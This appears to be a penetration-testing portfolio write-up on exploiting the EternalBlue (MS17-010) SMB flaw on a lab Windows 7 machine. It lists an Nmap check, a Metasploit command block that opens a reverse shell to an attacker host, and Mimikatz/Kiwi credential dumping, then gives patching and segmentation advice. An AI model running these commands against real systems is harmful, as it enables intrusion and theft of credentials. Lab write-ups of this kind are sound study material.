Objective: To identify and exploit the MS17-010 (EternalBlue) vulnerability on a legacy Windows target to achieve SYSTEM-level access and credential exfiltration.
1. The Vulnerability: Remote Code Execution (MS17-010)
EternalBlue is a critical vulnerability in the Microsoft SMBv1 server that allows remote attackers to execute arbitrary code via specially crafted packets. This project demonstrates the severe risk posed by legacy protocols and unpatched systems, where a single network request can lead to full system compromise without any user interaction.
2. Technical Execution: Network-Based Takeover
I utilized a systematic approach to identify the target’s susceptibility and deploy the EternalBlue exploit. By leveraging the Metasploit Framework, I established a reverse shell and performed post-exploitation tasks to dump system credentials, proving that the lack of system-level patching represents a total failure of the organization’s Security Perimeter.
| Component | Value | Purpose |
|---|---|---|
| Discovery | Nmap –script smb-vuln-ms17-010 | Confirms vulnerability without crashing the system. |
| Exploitation | MS17-010 EternalBlue | Deploys the kernel-level exploit to gain access. |
| Escalation | SYSTEM Privileges | Inherent to the exploit; provides total control. |
| Post-Exploit | Mimikatz / Kiwi | Used to exfiltrate NTLM hashes and plain-text creds. |
3. Execution Workflow
- Reconnaissance: Performed a stealthy Nmap scan to identify open SMB ports and fingerprint the operating system as Windows 7.
- Vulnerability Verification: Used a specialized Nmap NSE script to confirm that the target was specifically vulnerable to MS17-010.
- Exploit Deployment: Configured the
windows/smb/ms17_010_eternalbluemodule with the appropriate payload to match the target’s architecture. - Credential Harvesting: Once a Meterpreter session was established, I loaded the Kiwi extension to dump the local Security Accounts Manager (SAM) database.
4. Key Structure
# Example Metasploit workflow for EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
exploit
5. Evidence of Work


6. Professional Impact
This project underscores the critical importance of a robust Patch Management lifecycle. I demonstrated how a well-known vulnerability can be weaponized in seconds to compromise an entire system. My remediation strategy focuses on Disabling Legacy Protocols (SMBv1) and implementing Network Segmentation to prevent lateral movement, ensuring that even if one system is compromised, the rest of the infrastructure remains secure.
